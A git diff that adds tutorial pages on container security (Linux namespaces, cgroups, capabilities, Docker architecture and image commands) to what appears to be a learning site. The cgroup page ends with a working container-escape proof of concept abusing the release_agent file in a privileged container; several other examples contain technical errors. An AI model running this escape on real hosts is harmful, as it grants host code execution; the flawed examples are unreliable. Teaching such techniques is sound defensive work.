+# ping 192.168.0.2 + +``` +In this example, we created a namespace for network resources and connected it to the host using a veth pair. We were then able to assign IP addresses to each end of the pair and ping the IP address in the namespace from the host, demonstrating that the namespace is isolated from the host's network resources. +
+ +# Mount Namespaces with example + +Mount namespaces in containers allow for the creation of isolated environments for file systems. This means that each container has its own unique file system, separate from the host operating system and other containers. + +For example, let's say we have a container running a web server. Within this container, we have the necessary files and directories for the web server to run, such as HTML files and images. + +Now, let's say we want to run a second container that also has a web server, but with different HTML files and images. If we didn't have mount namespaces, both containers would be sharing the same file system and could potentially overwrite or interfere with each other's files. + +However, with mount namespaces, each container has its own isolated file system. This allows us to run both web servers with different files and directories, without them affecting each other. + +To create a mount namespace in a container, we can use the `--mount` flag when running the container. For example: + +```bash +$ docker run -d --name mycontainer --mount type=bind,source=/path/to/files, +target=/var/www/html nginx +``` + +This command creates a new container named "mycontainer" and mounts the directory at `/path/to/files` from the host operating system to the `/var/www/html` directory within the container. This allows the web server within the container to access and serve the files from the host operating system. + +# User Namespaces with example + +User Namespaces in containers allow the container to have its own independent user and group IDs, separate from the host system. This can be useful for providing isolation and security within the container, as well as allowing the container to run processes with different user and group permissions than the host system. + +For example, let's say we have a container running as the user `appuser` with a user ID of 1000 and a group ID of 1000. Without User Namespaces, this user would have the same permissions as the user `appuser` on the host system. However, with User Namespaces enabled, we can map the user and group IDs within the container to different IDs on the host system. For example, we could map the user ID 1000 within the container to the user ID 2000 on the host system. This would allow the container to run processes as user 2000 on the host system, while still appearing as user 1000 within the container. + + +To enable User Namespaces in a container, we can use the `--userns` flag when starting the container. For example: + +```bash +docker run --userns=host -it ubuntu + +``` + +This will start a new container running the Ubuntu image, with User Namespaces enabled and mapped to the host system's user and group IDs. + + +# UTS Namespaces with example + +UTS namespaces allow containers to have their own hostname and domain name system (DNS) domain, separate from the host machine. This means that each container can have its own hostname and DNS domain, without affecting the host machine or other containers. + +To demonstrate this with a hands-on example, we can create a container using Docker and specify a hostname for the container. + +First, let's create a container using the following command: + +``` +docker run -it --name my_container ubuntu + +``` + +This will create a container named `my_container` using the Ubuntu image. Now, let's specify a hostname for this container using the `-h` flag: + +```bash +docker run -it --name my_container -h my_container_host ubuntu + +``` +Now, if we check the hostname of the container using the `hostname` command, it will return `my_container_host`. This hostname is specific to the container and is not the same as the host machine's hostname. + +We can also specify a DNS domain for the container using the `--dns-domain` flag: + +```bash +docker run -it --name my_container -h my_container_host --dns-domain +my_container_domain ubuntu +``` +Now, if we check the DNS domain of the container using the "hostname -d" command, it will return "my_container_domain". This DNS domain is specific to the container and is not the same as the host machine's DNS domain. + +By using UTS namespaces, we can give each container its own unique hostname and DNS domain, allowing them to be isolated and operate independently from the host machine and other containers. \ No newline at end of file diff --git a/content/en/containersecurity/b5.Cgroup 2.md b/content/en/containersecurity/b5.Cgroup 2.md new file mode 100644 index 0000000..e89b78b --- /dev/null +++ b/content/en/containersecurity/b5.Cgroup 2.md @@ -0,0 +1,233 @@ +--- +title: "Cgroups" +description: "Linux Container Cgroups " +slug: "Cgroups" +--- + +# Cgroups +
+Cgroups, also known as control groups, are a Linux kernel feature that allows administrators to limit, prioritize, and allocate resources such as CPU, memory, and I/O bandwidth to a group of processes. + +In a container environment, Cgroups are used to ensure that each container has its own set of resources and cannot interfere with other containers or the host system. This helps to isolate the containers from each other and allows them to run in a more predictable and stable manner. + +Cgroups can be used to set limits on the amount of resources a container can use, such as CPU time or memory usage. This ensures that a single container cannot monopolize resources and negatively impact the performance of other containers or the host system. + +Cgroups are a key component in containerization technologies such as Docker and Kubernetes, which use them to manage and allocate resources for containers. They help to ensure that containers have the resources they need to run effectively, while also preventing resource contention between containers. + + +There are several types of cgroups (control groups) that can be used in a container: + +1.CPU: This cgroup limits the amount of CPU resources available to a container. It can be used to ensure that a container does not consume too much CPU time, which can impact the performance of other containers or the host machine. + +2.Memory: This cgroup limits the amount of memory available to a container. It can be used to prevent a container from consuming too much memory, which can cause the host machine to run out of available memory. +3.Disk I/O: This cgroup limits the amount of disk I/O (input/output) available to a container. It can be used to ensure that a container does not consume too much disk I/O, which can impact the performance of other containers or the host machine. +4.Network: This cgroup limits the amount of network bandwidth available to a container. It can be used to ensure that a container does not consume too much network bandwidth, which can impact the performance of other containers or the host machine. +5.PID: This cgroup limits the number of processes that a container can run. It can be used to prevent a container from creating too many processes, which can impact the performance of other containers or the host machine. + + +# CPU Cgroup with example +
+A CPU Cgroup (Control Group) is a Linux kernel feature that allows the administrator to limit, prioritize, and allocate CPU resources to specific groups of processes or containers. This helps to ensure that a single container or group of processes does not consume too much CPU resources and cause resource contention with other containers or processes on the system. + +To illustrate this with a hands-on example, let's say we have two containers running on our system: Container A and Container B. We want to allocate 50% of the CPU resources to Container A and the remaining 50% to Container B. + +To do this, we can use the "cgcreate" command to create a new CPU Cgroup for Container A: + +```bash +$ cgcreate -g cpu:/container_a + +``` +Next, we can use the "cgset" command to specify the CPU resources that Container A is allowed to use: + +```bash +$ cgset -r cpu.cfs_quota_us=50000 container_a + +``` + +This sets the CPU quota for Container A to 50,000 microseconds (50% of the available CPU resources). + +Finally, we can use the "cgclassify" command to assign the processes running in Container A to this Cgroup: + +```bash +$ cgclassify -g cpu:/container_a $(pidof ) + +``` + +This will ensure that the processes running in Container A are only allowed to use up to 50% of the CPU resources. + +We can repeat this process for Container B to allocate the remaining 50% of CPU resources to it. + +By using CPU Cgroups, we can effectively control and allocate CPU resources to different containers and processes on our system, ensuring that each container or process gets the resources it needs without causing resource contention. + + +# Memory Cgroup with example +
+ +Memory Cgroups (control groups) are a Linux kernel feature that allow administrators to allocate and limit the amount of memory resources available to a group of processes. This is particularly useful in the context of containers, where the containerized applications are isolated from the host system and can potentially consume all available memory resources. + +For example, consider a situation where a containerized application is running on a host with 8 GB of memory. Without memory Cgroups, the application could potentially consume all 8 GB of memory, potentially causing other processes on the host to crash or experience performance issues. + +To address this issue, an administrator can use memory Cgroups to limit the amount of memory available to the containerized application. For example, the administrator could specify that the containerized application is only allowed to use 4 GB of memory. If the application attempts to consume more than 4 GB of memory, it will be killed by the kernel. + +To demonstrate this concept with a hands-on example, we can use the "docker" command to run a containerized application and specify a memory limit using the `--memory` flag. For example: + +```bash +docker run --memory 4g my_containerized_app + +``` + +This command will run the containerized application `my_containerized_app` and limit it to using a maximum of 4 GB of memory. If the application attempts to consume more than 4 GB of memory, it will be killed by the kernel. + +# Disk I/O Cgroup with example +
+A Disk I/O Cgroup is a Linux kernel feature that allows administrators to set limits on the amount of disk input/output (I/O) a group of processes can perform. This can be useful in a container environment, as it allows administrators to ensure that one container or group of containers does not consume too many resources and negatively impact the performance of other containers or the host system. + +To create a Disk I/O Cgroup in a container environment, you will need to have a container runtime that supports Cgroups, such as Docker or Kubernetes. + +Here is a hands-on example using Docker: + +1. Run the following command to create a new container named "my-container" with a Disk I/O Cgroup limit of 100 kilobytes per second (KB/s): + +```bash +docker run -it --name my-container --cgroup-parent my-cgroup +--device-read-bps /dev/sda:100000 --device-write-bps /dev/sda:100000 ubuntu + + +``` + + +Once the container is running, you can use the cgclassify command to verify that the Disk I/O Cgroup limit has been applied: + +```bash +cgclassify -g blkio:/my-cgroup/my-container + +``` +You can also use the cgtop command to monitor the Disk I/O usage of the container in real-time: + +```bash +cgtop -d 1 -c 2 -g blkio + +``` + +his will display a list of all containers with Disk I/O Cgroups, along with their usage and limits. In this example, you should see "my-container" listed with a limit of 100 KB/s. + +By setting Disk I/O limits for containers, you can ensure that each container has the resources it needs to perform its tasks without impacting the performance of other containers or the host system. This can help to improve the overall performance and stability of your container environment. + + +# Network Cgroup with example +
+Network Cgroup is a Linux kernel feature that allows the administrator to limit, prioritize, and control network resources for a group of processes. In the context of containers, Network Cgroup can be used to limit the amount of bandwidth, number of connections, and other network resources that a container can use. + +For example, consider a scenario where you have a container running a web server. You may want to limit the amount of bandwidth the container can use to prevent it from consuming too much of the available network resources. To do this, you can use Network Cgroup to set a bandwidth limit for the container. + +To demonstrate this with a hands-on example, let's first create a new container using Docker: + +```bash +$ docker run -it --name web-server ubuntu +``` + +Next, we will use the `cgcreate` command to create a new Network Cgroup for our container: + +```bash +$ cgcreate -g net_cls:web-server + +``` + +This will create a new Network Cgroup named web-server that we can use to limit the network resources of our container. + +To set a bandwidth limit for our container, we can use the tc command to create a new traffic control class and attach it to our Network Cgroup: + +```bash +$ tc class add dev eth0 parent 1:1 classid 1:10 htb rate 1mbps +$ cgset -r net_cls.classid=1:10 web-server + +``` +This will limit the container to using 1Mbps of bandwidth. If the container tries to use more bandwidth than this, it will be throttled by the kernel. + +We can verify that the bandwidth limit is in place by using the tc command to show the traffic control classes: + +```bash +$ tc -s class show dev eth0 + +``` + +This will show all of the traffic control classes on the eth0 interface, including the one we just created for our container. + +In this example, we demonstrated how to use Network Cgroup to limit the bandwidth used by a container. However, Network Cgroup can also be used to control other network resources, such as the number of connections, packet rate, and more. + + +# PID Cgroup with example +
+PID stands for "Process ID" and is a unique identifier assigned to each process running on a computer. A PID allows the system to identify and manage each process individually. + +Cgroup stands for "Control Group" and is a Linux kernel feature that allows the system to allocate resources (such as CPU and memory) to a group of processes. This allows the system to prioritize or limit the resource usage of certain processes. + +In a container, PID and Cgroup are used to isolate processes and resources within the container. For example, if we have a container running a web server, we can assign a specific PID and Cgroup to that container to ensure that the web server has access to the necessary resources and is not impacted by other processes running on the system. + +Here is a hands-on example of using PID and Cgroup in a container: + +Start a new container using the docker run command, specifying the image and any necessary arguments: + +```bash +docker run -d --name my-web-server -p 8080:80 nginx + + +``` +Check the PID of the main process inside the container by running the following command: + +```bash +docker exec my-web-server ps -aux + + +``` +This will display a list of processes running inside the container, including the PID of the main process (in this case, the nginx web server). + +Check the Cgroup of the container by running the following command: + +```bash + +cat /sys/fs/cgroup/memory/docker/[CONTAINER ID]/memory.usage_in_bytes + + +``` + + +This will display the current memory usage of the container in bytes. + +By using PID and Cgroup, we can ensure that the processes and resources within the container are properly isolated and managed. + + + +# Created Group release agent (container escape). +
+MITRE: Privilege Escalation + +The PoC relied on another misconfiguration where the container has elevated privileges, either by the `--privileged` flag or the apparmor=unconfined flag. The escape can be triggered by an exploit using the Linux cgroups (control groups) mechanism and a β€˜release_agent’ file. + +Linux control groups are intended to allow multiple Docker containers to run in isolation while limiting and monitoring their use of resources. However, the β€˜release_agent’ file contains a command that is executed by the kernel with full privileges on the host once the last task in a cgroup terminates. The PoC abuses this functionality by creating a β€˜release_agent’ file with a malicious command, and then killing off all the tasks in the cgroup. + +As the cgroup files are present both in the container and on the host, it is possible to modify them from either, which means an attacker can spawn a process inside the cgroup and gain code execution on the host. + + +```bash +# On the host + +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd + +sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" + + +``` + +MITRE: Privilege Escalation \ No newline at end of file diff --git a/content/en/containersecurity/b6.Capabilities 2.md b/content/en/containersecurity/b6.Capabilities 2.md new file mode 100644 index 0000000..b9851dd --- /dev/null +++ b/content/en/containersecurity/b6.Capabilities 2.md @@ -0,0 +1,177 @@ +--- +title: "Capabilities " +description: "Linux Container Capabilities " +slug: "capabilities" +--- + + +# Capabilities +
+There are several types of capabilities that are used in Linux container security: + +1.Process isolation: This allows the separation of processes between different containers, ensuring that processes running in one container do not have access to resources or processes in another container. + +2.Resource limitation: This allows the allocation of specific resources (such as CPU, memory, and disk space) to each container, ensuring that one container does not consume more resources than it has been allocated. + +3.User namespace: This allows the creation of user accounts within a container that are separate from the host system, ensuring that users within a container do not have access to resources outside of the container. + +4.SELinux or AppArmor: These are security frameworks that allow administrators to set granular permissions for processes and resources within a container, ensuring that only authorized processes and resources can be accessed. + +5.Network isolation: This allows the creation of separate network environments for each container, ensuring that containers cannot communicate with each other or the host system unless explicitly allowed. + +Overall, these capabilities help to ensure that containers are secure and isolated from each other, protecting the host system and other containers from potential vulnerabilities or attacks. + + +# Process Isolation +
+Process isolation is a security feature that allows containers to operate as if they are running on a separate machine, even though they are sharing the same underlying operating system and hardware resources with other containers. This is achieved by isolating the processes running inside the container from those running outside, and by limiting the resources (such as CPU, memory, and network bandwidth) that a container can access. + +One way to demonstrate process isolation in a container is to create two containers, each running a different application. For example, we can create a container running a web server and another container running a database. We can then verify that the processes running inside each container are isolated from each other by trying to access the database from the web server container (which should fail). + +Here is a hands-on example of how to demonstrate process isolation in containers using Docker: + +First, install Docker on your machine if you don't already have it. +Start by creating a Docker network for our containers to communicate over. Run the following command: + +```bash +docker network create my-network +``` +Next, create a container running a web server by running the following command: + +```bash +docker run -d --name web-server --network my-network -p 80:80 nginx:latest +``` +This will create a container running the latest version of the nginx web server, and expose it on port 80 of the host machine. + +Now, create a second container running a database by running the following command: + +```bash +docker run -d --name database --network my-network -p 3306:3306 mysql:latest +``` +This will create a container running the latest version of the MySQL database, and expose it on port 3306 of the host machine. + +To verify that the two containers are isolated from each other, try to connect to the database from the web server container by running the following command: + +```bash +docker exec -it web-server mysql -h database -u root -p + +``` + +This should fail with an error message, indicating that the web server container is unable to access the database container. + +if you want to verify that the two containers are able to communicate with each other, you can connect to the web server container and use the curl command to make a request to the database container. For example: + +```bash +docker exec -it web-server bash +curl http://database:3306 + +``` +This should return the MySQL welcome message, indicating that the web server container is able to communicate with the database container. + +Overall, this example demonstrates how process isolation in containers can be used to securely separate different applications and services, even though they are running on the same machine. + + +# Resource limitation +
+Resource limitation capabilities in container security refer to the ability to set limits on the amount of resources (such as CPU, memory, and network bandwidth) that a container is allowed to use. This can be useful for preventing a container from consuming too many resources and potentially impacting the performance of other containers or the host system. + +One example of using resource limitation capabilities in a hands-on scenario is to set limits on the CPU and memory usage of a container when deploying it. This can be done using the `--cpu-shares` and `--memory` flags when running the `docker run` command. For example: + +```bash +$ docker run -d --name my-container --cpu-shares 512 --memory 512MB my-image + +``` + +This command will run a container named "my-container" using the image "my-image", and limit the container's CPU usage to 512 shares (which is a relative value based on the host system's CPU) and its memory usage to 512MB. If the container tries to use more resources than these limits, it will be restricted and may experience performance issues. + +Resource limitation capabilities can be an effective tool for improving the security and stability of a container environment, as they can prevent a single container from causing issues for other containers or the host system. However, it's important to carefully consider the resource requirements of each container and set appropriate limits to ensure that the container has sufficient resources to function properly. + + +# User namespace +
+User namespaces in container security allow for the creation of a virtualized user environment within a container. This means that the processes within the container can run with a different set of user and group IDs than the host system. This can be useful in a number of scenarios, such as: + +- Running a container with a different user or group ID than the host system, which can help to isolate the processes within the container and prevent them from accessing sensitive host resources. +- Allowing a container to run as a specific user or group ID, even if that user or group ID does not exist on the host system. This can be useful when the container needs to access certain resources that are restricted to specific users or groups. +To demonstrate a hands-on example of user namespaces in container security, we can run a container with a different user and group ID than the host system. For example, we can create a container that runs as the "foo" user and "bar" group, even if those users and groups do not exist on the host system. + +To do this, we can use the following Docker command: + +```bash +$ docker run --rm -it --user 1000:1000 --name test-container ubuntu + +``` + +This will create a new container with the name "test-container", running the Ubuntu image and using the user and group IDs of 1000. We can verify that the container is running as the correct user and group by running the id command inside the container: + +```bash +# id +uid=1000(foo) gid=1000(bar) groups=1000(bar) + +``` +As we can see, the container is now running as the "foo" user and "bar" group. This allows us to isolate the processes within the container and prevent them from accessing sensitive host resources. It also allows us to access resources that are restricted to specific users or groups within the container, even if those users or groups do not exist on the host system. + + +# SELinux or AppArmor +
+SELinux (Security Enhanced Linux) and AppArmor are two examples of mandatory access control systems that can be used to secure containers. + +SELinux is a Linux kernel security module that allows administrators to define fine-grained access control policies for users, processes, and files. These policies are enforced at the kernel level, making it difficult for malicious actors to bypass or manipulate them. + +To demonstrate SELinux in action, we can create a simple container and apply an SELinux context to it. For example, let's create a container using the following command: + +```bash +$ docker run -it ubuntu bash + +``` +Next, we can apply an SELinux context to the container by using the chcon command: + +```bash +$ chcon -t container_t /var/lib/docker/overlay2/ + +``` + +This sets the SELinux context for the container to "container_t", which is a type of SELinux policy that is designed specifically for containers. This policy allows the container to access certain resources, such as networking and file system resources, but restricts its access to other resources, such as system processes and system files. +
+AppArmor is another mandatory access control system that can be used to secure containers. It works by defining profiles for applications, which specify what resources and actions the application is allowed to access and perform. These profiles are enforced at the kernel level, making it difficult for malicious actors to bypass or manipulate them. +
+To demonstrate AppArmor in action, we can create a container and apply an AppArmor profile to it. For example, let's create a container using the following command: + +```bash +$ docker run -it ubuntu bash + +``` +Next, we can apply an AppArmor profile to the container by using the aa-enforce command: + +```bash +$ aa-enforce /etc/apparmor.d/container_profile + +``` +This sets the AppArmor profile for the container to "container_profile", which is a predefined profile that is designed specifically for containers. This profile allows the container to access certain resources, such as networking and file system resources, but restricts its access to other resources, such as system processes and system files. + + +# Network isolation +
+Network isolation capabilities in container security refer to the ability to restrict the network traffic between containers and between containers and the host system. This is important for maintaining the security and isolation of containers, as it ensures that containers cannot communicate with each other or the host system unless explicitly allowed. +
+One example of a hands-on approach to implementing network isolation in container security is through the use of Docker networks. Docker networks allow users to create virtual networks within their Docker environment, allowing them to specify which containers can communicate with each other and which cannot. +
+For example, let's say we have two containers running on a Docker host, Container A and Container B. By default, these two containers can communicate with each other and the host system. However, we can use Docker networks to isolate these two containers from each other and the host system. +
+To do this, we can create a Docker network and specify which containers can connect to it. For example, we could create a network called "isolated" and only allow Container A to connect to it. This would mean that Container B and the host system would not be able to communicate with Container A. + +To create a Docker network and specify which containers can connect to it, we can use the following command: + +```bash +docker network create --driver bridge isolated + +``` +To add Container A to this network, we can use the following command: + +```bash +docker network connect isolated ContainerA + +``` +This would effectively isolate Container A from Container B and the host system, as they would not be able to communicate with it through the network. +
+Overall, network isolation capabilities in container security are important for maintaining the security and isolation of containers, as they allow users to specify which containers can communicate with each other and the host system. By using tools such as Docker networks, users can easily implement network isolation in their container environment. \ No newline at end of file diff --git a/content/en/containersecurity/b7.docker-architecture 2.md b/content/en/containersecurity/b7.docker-architecture 2.md new file mode 100644 index 0000000..02e44c7 --- /dev/null +++ b/content/en/containersecurity/b7.docker-architecture 2.md @@ -0,0 +1,279 @@ +--- +title: " Docker architecture and its components " +description: " Dockef Architecture in detail " +slug: "Docker-architecture-and-its-components" +--- + + +Docker architecture and its components + +# Docker Architecture + +![](./images/docker-engine-architecture.svg) + + + +Docker architecture consists of three main components: + +- Docker Engine: This is the core component of Docker and is responsible for building, running, and distributing Docker containers. It is made up of a daemon, a REST API, and a CLI (command line interface). +- Docker Hub: This is a cloud-based registry service that allows users to share and store Docker images. It acts as a central repository for Docker images and makes it easy for users to find and download images that they need for their projects. +- Docker Client: This is a command-line tool that allows users to interact with the Docker daemon and perform various tasks such as building, running, and distributing Docker containers. + +In addition to these main components, Docker architecture also includes other components such as Docker Compose (a tool for defining and running multi-container Docker applications), Docker Swarm (a tool for orchestrating and managing a cluster of Docker containers), and Docker Machine (a tool for creating and managing Docker hosts on various infrastructure platforms). + + +![](./images/docker-architecture.png) + +# Docker Engine + +To interact with the Docker Engine using Go, we can use the official Docker API library for Go, which can be found at https://github.com/docker/docker. + +Here are the steps to interact with the Docker Engine using Go: + +1.Import the necessary libraries: + +```go +import ( + "context" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" +) + +``` +2.Create a new Docker client: + +```go +cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation()) +if err != nil { + log.Fatal(err) +} + +``` +3.Use the client to perform various actions on the Docker Engine, such as pulling an image from a registry: + +```go +reader, err := cli.ImagePull(context.Background(), "alpine:latest", types.ImagePullOptions{}) +if err != nil { + log.Fatal(err) +} + +io.Copy(os.Stdout, reader) + + +``` + +Close the client when finished: + +```go +reader, err := cli.ImagePull(context.Background(), "alpine:latest", types.ImagePullOptions{}) +if err != nil { + log.Fatal(err) +} + +io.Copy(os.Stdout, reader) + + +``` + + +Using the Docker API library for Go, we can perform various actions on the Docker Engine, such as pulling images, creating and managing containers, and more. + + +# Docker Hub +
+First, we need to import the necessary packages for interacting with Docker Hub. This includes the "net/http" package for making HTTP requests and the "encoding/json" package for parsing the response from Docker Hub. +
+Next, we need to define a function that makes an HTTP GET request to the Docker Hub API endpoint for retrieving a list of all available repositories. We can use the "http.NewRequest" function to create the request and the "http.DefaultClient.Do" function to execute the request. +
+We can then parse the response from Docker Hub using the "json.Unmarshal" function and store the list of repositories in a variable. + +Finally, we can iterate through the list of repositories and print out the name and description of each repository. + +Here is the complete Golang program: + + +```go +package main + +import ( +"encoding/json" +"fmt" +"net/http" +) + +func main() { +// Make HTTP GET request to Docker Hub API endpoint for retrieving list of repositories +req, err := http.NewRequest("GET", "https://hub.docker.com/v2/repositories/", nil) +if err != nil { +fmt.Println(err) +return +} +// Execute request +resp, err := http.DefaultClient.Do(req) +if err != nil { + fmt.Println(err) + return +} + +// Parse response from Docker Hub +var data map[string][]map[string]interface{} +err = json.NewDecoder(resp.Body).Decode(&data) +if err != nil { + fmt.Println(err) + return +} + +// Iterate through list of repositories and print out name and description +for _, repo := range data["results"] { + fmt.Println(repo["name"], repo["description"]) +} +} + + +``` +# Docker Client + + +To interact with the Docker client in Go, we will need to import the github.com/docker/docker/client package and create a new Docker client using the NewClient function. + +Here are the steps to follow: + +1. Install the Docker SDK for Go by running `go get github.com/docker/docker/client`. +2. Import the github.com/docker/docker/client package in your Go code. +3. Create a new Docker client using the client.NewClient function. This function takes a string argument that specifies the Docker daemon URL, and returns a client.Client object. +4. Use the methods provided by the `client.Client` object to interact with the Docker daemon. Some examples of common methods include `ListContainers`, `InspectContainer`, and `CreateContainer`. +For example, to list all running containers on the Docker daemon, you could use the following code: + +```go + +package main + +import ( + "context" + "fmt" + "github.com/docker/docker/client" +) + +func main() { + // Create a new Docker client + cli, err := client.NewClient("unix:///var/run/docker.sock", "v1.39", nil, nil) + if err != nil { + panic(err) + } + + // List all running containers + containers, err := cli.ListContainers(context.Background(), types.ContainerListOptions{All: true}) + if err != nil { + panic(err) + } + + // Print the names of the containers + for _, container := range containers { + fmt.Println(container.Names[0]) + } +} + + +``` + +This code creates a new Docker client using the Unix socket located at `/var/run/docker.sock`, and then lists all running containers using the `ListContainers` method. Finally, it prints the names of the containers to the console. + + + +# Docker Runtime + +- Containerd + +Containerd is a runtime for managing containers on a system. It is designed to be lightweight and efficient, making it a popular choice for use in container-based environments. +
+Here is an example of using Containerd to run a Docker container: + +1.Install ContainerD on your system: + +```bash +sudo apt-get install containerd + +``` +2. Start the Containerd daemon: + +```bash +sudo systemctl start containerd + +``` +3. Pull a Docker image from the Docker Hub: + +```bash +docker pull ubuntu + +``` +Run a Docker container using Containerd: + +```bash +containerd run --name my-container ubuntu +``` + + +This will start a new Ubuntu container with the name "my-container" using ContainerD as the runtime. You can then access the container and run commands inside it just like any other Docker container. + + +# shim +
+Docker runtime is a term that refers to the environment in which Docker containers are executed. It includes the operating system, network, and storage resources required to run the containers. + +The Docker runtime also includes a shim, which is a small utility program that acts as an intermediary between the container and the host operating system. The shim is responsible for starting and stopping the container, as well as handling any errors or issues that may occur during execution. + +An example of how the shim works would be as follows: + +1.The user creates a Docker container and specifies the desired runtime environment (e.g. Linux, Windows, etc.) +2.The container is built and stored in a Docker image, which includes all the necessary files and dependencies for the container to run. +3.When the user runs the container, the shim is activated and begins executing the container's code. +4.The shim manages the container's execution, including starting and stopping the container, handling errors, and allocating resources such as memory and CPU. +5. Once the container finishes executing, the shim shuts it down and releases any resources that were being used. + +The Docker runtime and shim work together to ensure that containers are able to run smoothly and efficiently within the specified environment. + +# runc + +runc is the default runtime for Docker containers. It is a command line tool for running and managing containers according to the Open Container Initiative (OCI) specification. + +Here is an example of using runc to run a Docker container: + +1. First, pull a Docker image from the registry using the 'docker pull' command: + +```bash +docker pull alpine + +``` +2. Next, create a configuration file for the container using the 'runc spec' command: + +```bash +runc spec + +``` + +3. The configuration file can then be modified to specify the container's desired settings, such as the root filesystem, network settings, and runtime options. + +4. To create and start the container, use the 'runc run' command, followed by the name of the container and the configuration file: + +```bash +runc run my-container config.json + +``` +This will start the container based on the specified configuration and run the default command specified in the Docker image. + +To stop the container, use the 'runc kill' command: + +```bash +runc kill my-container + +``` +And to delete the container, use the 'runc delete' command: + +```bash + +runc delete my-container + +``` + + + diff --git a/content/en/containersecurity/b8.Intracting-with-container 2.md b/content/en/containersecurity/b8.Intracting-with-container 2.md new file mode 100644 index 0000000..c1eadd1 --- /dev/null +++ b/content/en/containersecurity/b8.Intracting-with-container 2.md @@ -0,0 +1,1023 @@ +--- +title: "Interacting with container ecosystem " +slug: "Interacting-with-container-ecosystem" +--- + +# Interacting with container ecosystem + +- Docker Images and Image Layers + + - In Docker, an image is a lightweight, stand-alone, executable package that includes everything needed to run a piece of software, including the application code, libraries, dependencies, and runtime. It's used to build and run containerized applications. + + - A Docker image is made up of a series of layers, where each layer represents an instruction in the image's Dockerfile. When you build an image, each instruction in the Dockerfile creates a new layer in the image. For example, if the Dockerfile has a COPY instruction to copy in some new files, that creates a new layer in the image with those files. If you then change a file and rebuild the image, only the layers that have changed need to be rebuilt, which makes building images faster and more efficient. + + - Each layer is a delta of the changes made in that instruction compared to the previous layer. When you run a container from an image, Docker creates a new top writable layer on top of the underlying layers, allowing you to make changes to the running container. These changes are not persisted when the container is stopped and removed, unless you commit the changes to a new image. + + - In summary, a Docker image is a lightweight, stand-alone, executable package that contains everything needed to run a piece of software, and it is made up of a series of layers representing instructions in the image's Dockerfile. + +# Docker images commands + +```bash +docker images [OPTIONS] [REPOSITORY[:TAG]] + +``` + +- The default docker images will show all top level images, their repository and tags, and their size. +
+- Docker images have intermediate layers that increase reusability, decrease disk usage, and speed up docker build by allowing each step to be cached. These intermediate layers are not shown by default. +
+- The SIZE is the cumulative space taken up by the image and all its parent images. This is also the disk space used by the contents of the Tar file created when you docker save an image. + +- An image will be listed more than once if it has multiple repository names or tags. This single image (identifiable by its matching IMAGE ID) uses up the SIZE listed only once. + +- docker images - list all local Docker images + +Example: `docker images` +
+ +- ```docker image ls``` - list all local Docker images with additional information such as image ID, repository, and tag + + +Example: `docker image ls` + + +- ```docker image inspect``` - display detailed information about a Docker image + +Example: `docker image inspect ubuntu:latest` +
+ +- ```docker image history``` - show the history of a Docker image +Example: ```docker image history ubuntu:latest``` +
+ +- ```docker image pull``` - download a Docker image from a registry +Example: ```docker image pull ubuntu:latest``` +
+ +- ```docker image push``` - push a Docker image to a registry +Example: ```docker image push my-image:latest``` +
+ +- ```docker image tag``` - add a tag to a Docker image +Example: ```docker image tag ubuntu:latest my-image:latest``` +
+ +- ```docker image build``` - build a Docker image from a Dockerfile +Example: ```docker image build -t my-image:latest .``` +
+ +- ```docker image save``` - save a Docker image to a tar archive +Example: ```docker image save ubuntu:latest > ubuntu.tar``` +
+ +- ```docker image load` - load a Docker image from a tar archive +Example: ```docker image load < ubuntu.tar``` + + +| Name, shorthand | Default | Description | +|-|-|-| +| --all , -a| | Show all images (default hides intermediate images) | +|--digests | | Show digests | +|--filter , -f | | Filter output based on conditions provided | +|--format | | Pretty-print images using a Go template| +|--no-trunc | | Don't truncate output | +|--quiet , -q | | Only show image IDs| + +
+ +# List recently created images + +```bash +$ docker images +``` +alternative + +```bash +$ docker image ls +``` + +# Filtering Docker Image List + +```bash +$ docker images --filter " = " + +``` +With the `–filter` option, you can specify the following keys : + +
+ +- ```reference``` : that can be used in order to isolate images having a certain name or tag; + +```bash +$ docker images --filter "reference=deb*" +``` +`before` : to filter images created β€œbefore” a specific point in time; + +```bash +$ docker images --filter "before=" +``` + +```since``` : to filter images since a specific point in time (usually another image creation); + +```bash + docker images --filter "since=" +``` + +```label``` : if you used the LABEL instruction to create metadata for your image you can filter them later with this key + +```bash + $ docker images --filter "label=maintainer=" +``` + +```dangling``` : in order to isolate images that are not used anymore. + +```bash +docker images --filter "dangling=true" +``` + +### Here are some examples of using the 'docker images' command with the '--format' option: + +To list all Docker images and their IDs in a table format, use the following command: + +```bash +docker images --format "table {{.ID}}\t{{.Repository}}" + +``` +output + +```bash +IMAGE ID REPOSITORY +4f4b6b93e0a4 alpine +``` + +To list all Docker images and their sizes in a custom format, use the following command: + +```bash +docker images --format "{{.Size}}\t{{.Repository}}" +``` +output + +```bash +SIZE REPOSITORY +3.99 MB alpine + +``` + +To list all Docker images and their created dates in a custom format, use the following command: + +```bash +docker images --format "{{.CreatedAt}}\t{{.Repository}}" + +``` + +output + +```bash +CREATED AT REPOSITORY +2022-03-01T00:00:00Z alpine +``` + +To list all Docker images with their full repository and tag names, use the `--no-trunc` flag: + +```bash +docker images --all --no-trunc + +``` + +```docker images --quiet``` - This command lists all of the Docker images on the system, but only displays the image IDs. + +```bash +docker images --quiet + +``` + +output + +```bash +cdd72a7d23c8 +``` + +```docker pull --quiet [image name]``` - This command pulls a Docker image from the registry, but only displays the image ID of the image being pulled. + +```bash +docker pull --quiet alpine + +``` + +output + +```bash +d9e555c53f53 +``` + +```docker build --quiet -t [image name] [Dockerfile location]``` - This command builds a Docker image from a Dockerfile, but only displays the image ID of the image being built. + +```bash +docker build --quiet -t my-image . +``` +output + +```bash +24c1f2a1c63d +``` + +# Understand Image Layers +
